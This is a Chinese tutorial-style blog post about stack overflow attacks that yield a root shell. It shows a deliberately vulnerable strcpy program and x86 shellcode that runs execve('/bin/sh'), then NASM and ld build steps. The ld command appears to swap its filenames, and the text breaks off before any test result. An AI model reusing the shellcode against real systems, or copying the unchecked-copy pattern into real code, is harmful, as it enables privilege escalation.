热门标签
热门文章
- 1开源项目-智数通数据中台管理系统_智数通数据平台搭建
- 2最详细的python安装教程,小白建议收藏
- 3vue滚动加载数据_后端不分页,vue2实现滚动加载数据
- 4windows远程连接linux并实现上传下载文件,不需要额外安装任何软件~_windows上传文件到linux 免安装
- 5MongoDB 和 AI 赋能行业应用:电信和媒体
- 6数据库性能测试大纲_数据库功能测试大纲
- 7情感分析中的深度学习_在情感分析中,通过构建包含多个处理层的计算模型,并创建多个级别的抽象层来表示数
- 8MAC M2下安装Java及maven环境变量_mac m2 安装jdk
- 9使用Java定时从Nginx的日志中获取黑客的ip并加入访问黑名单_mstshash=administr
- 10Virtual Private Network(虚拟专用网络)详解
当前位置: article > 正文
栈溢出攻击提权进入root shell_栈溢出攻击 rootshell无法获取
作者:盐析白兔 | 2024-06-12 00:20:06
赞
踩
栈溢出攻击 rootshell无法获取
以前对栈溢出攻击只是一种感官上的,最近学了shellcode,才真切地感觉到了栈溢出攻击有多么危险。
为了测试简单,写一个比较简单的程序,我们称之为bug.c
- #include <stdio.h>
- #include <string.h>
-
- int main(int argc, char **argv) {
- char buff[500];
- strcpy(buff,argv[1]);
- return 0;
- }
这段代码比较简单,就是为了用来测试栈溢出的,很显然,它是有漏洞的。
好了,我们准备好进入root shell的汇编代码:
- Section .text
- global _start
-
- _start:
- xor eax,eax
- push eax
- push 0x68732f ; /sh 小端机存储
- push 0x6e69622f ; /bin 小端存储
- mov ebx,esp
- push eax
- push ebx
- mov ecx,esp
- xor edx,edx
- mov al,0xb ; execve函数
- int 0x80
我们用nasm编译:
nasm -f elf execve.asm用ld链接:
ld execve -o execve.o我们测试一下结果:
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/705298
推荐阅读
相关标签
